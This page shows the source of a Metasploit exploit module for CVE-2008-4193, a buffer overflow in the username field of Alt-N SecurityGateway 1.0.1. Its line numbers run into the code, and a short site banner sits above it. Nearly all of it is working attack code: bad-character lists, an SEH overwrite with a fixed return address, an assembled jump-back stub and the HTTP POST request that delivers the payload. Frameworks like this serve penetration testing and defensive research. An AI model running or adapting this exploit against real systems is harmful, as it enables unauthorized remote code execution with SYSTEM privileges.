Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/windows/http/altn_securitygateway.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = AverageRanking78# XXX: Automatic targetting used HttpFingerprint = { :uri => '/SecurityGateway.dll', :pattern => [ /SecurityGateway / ] }910include Msf::Exploit::Remote::HttpClient11include Msf::Exploit::Seh1213def initialize(info = {})14super(update_info(info,15'Name' => 'Alt-N SecurityGateway username Buffer Overflow',16'Description' => %q{17Alt-N SecurityGateway is prone to a buffer overflow condition. This18is due to insufficient bounds checking on the "username"19parameter. Successful exploitation could result in code20execution with SYSTEM level privileges.2122NOTE: This service doesn't restart, you'll only get one shot. However,23it often survives a successful exploitation attempt.24},25'Author' => [ 'jduck' ],26'License' => MSF_LICENSE,27'References' =>28[29[ 'CVE', '2008-4193' ],30[ 'OSVDB', '45854' ],31[ 'BID', '29457']32],33'Privileged' => true,34'DefaultOptions' =>35{36'EXITFUNC' => 'thread',37},38'Payload' =>39{40'Space' => 476,41# note: 0xd7 might not be translated, but w/e42'BadChars' => "\x00" + ((0x40..0x5a).to_a + [ 0x8a, 0x8c, 0x8e, 0x9f ] + (0xc0..0xdf).to_a).pack('C*'),43'StackAdjustment' => -3500,44'EncoderType' => Msf::Encoder::Type::SingleStaticBit,45'EncoderOptions' =>46{47'BitNumber' => 0x5,48'BitValue' => true,49}50},51'Platform' => 'win',52'Targets' =>53[54[ 'Automatic Targeting', { } ],55# NOTE: the return address must be tolower() safe56[ 'SecurityGateway 1.0.1 Universal', { 'Ret' => 0x6767756f }], # p/p/r in XceedZip.dll 4.5.77.057],58'DefaultTarget' => 0,59'DisclosureDate' => '2008-06-02'))6061register_options(62[63Opt::RPORT(4000)64])65end666768# Identify the target based on the SecurityGateway version number69def auto_target70info = http_fingerprint({ :uri => '/SecurityGateway.dll' }) # automatic targetting71if (info =~ /SecurityGateway (1\..*)$/)72case $173when /1\.0\.1/74return self.targets[1]75end76end77# Not vulnerable78nil79end8081def check82if auto_target83Exploit::CheckCode::Appears84end85Exploit::CheckCode::Safe86end8788def exploit8990# handle auto-targeting91mytarget = target92if target.name =~ /Automatic/93print_status("Attempting to automatically select a target...")94mytarget = auto_target95if mytarget.nil?96fail_with(Failure::NoTarget, "Unable to automatically select a target")97end98print_status("Automatically selected target \"#{mytarget.name}\"")99end100101# the buffer gets CharLowerBuff()'d and passed to:102# sprintf(str, "Attempt to login with invalid user name %s from %s", buf, ip_str);103104sploit = payload.encoded105sploit << generate_seh_record(mytarget.ret)106distance = payload_space + 8107sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string108sploit = Rex::Text.to_hex(sploit, '%')109sploit << rand_text_alphanumeric(512)110111post_data = 'RequestedPage=login'112post_data << '&username=' << sploit113post_data << '&passwd=world'114115print_status("Sending request...")116res = send_request_cgi({117'uri' => '/SecurityGateway.dll',118'method' => 'POST',119'content-type' => 'application/x-www-form-urlencoded',120'data' => post_data,121}, 5)122123handler124end125end126127128